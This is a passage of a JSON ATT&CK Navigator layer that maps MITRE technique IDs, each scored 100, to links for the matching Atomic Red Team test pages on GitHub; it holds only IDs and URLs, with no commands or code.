Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View 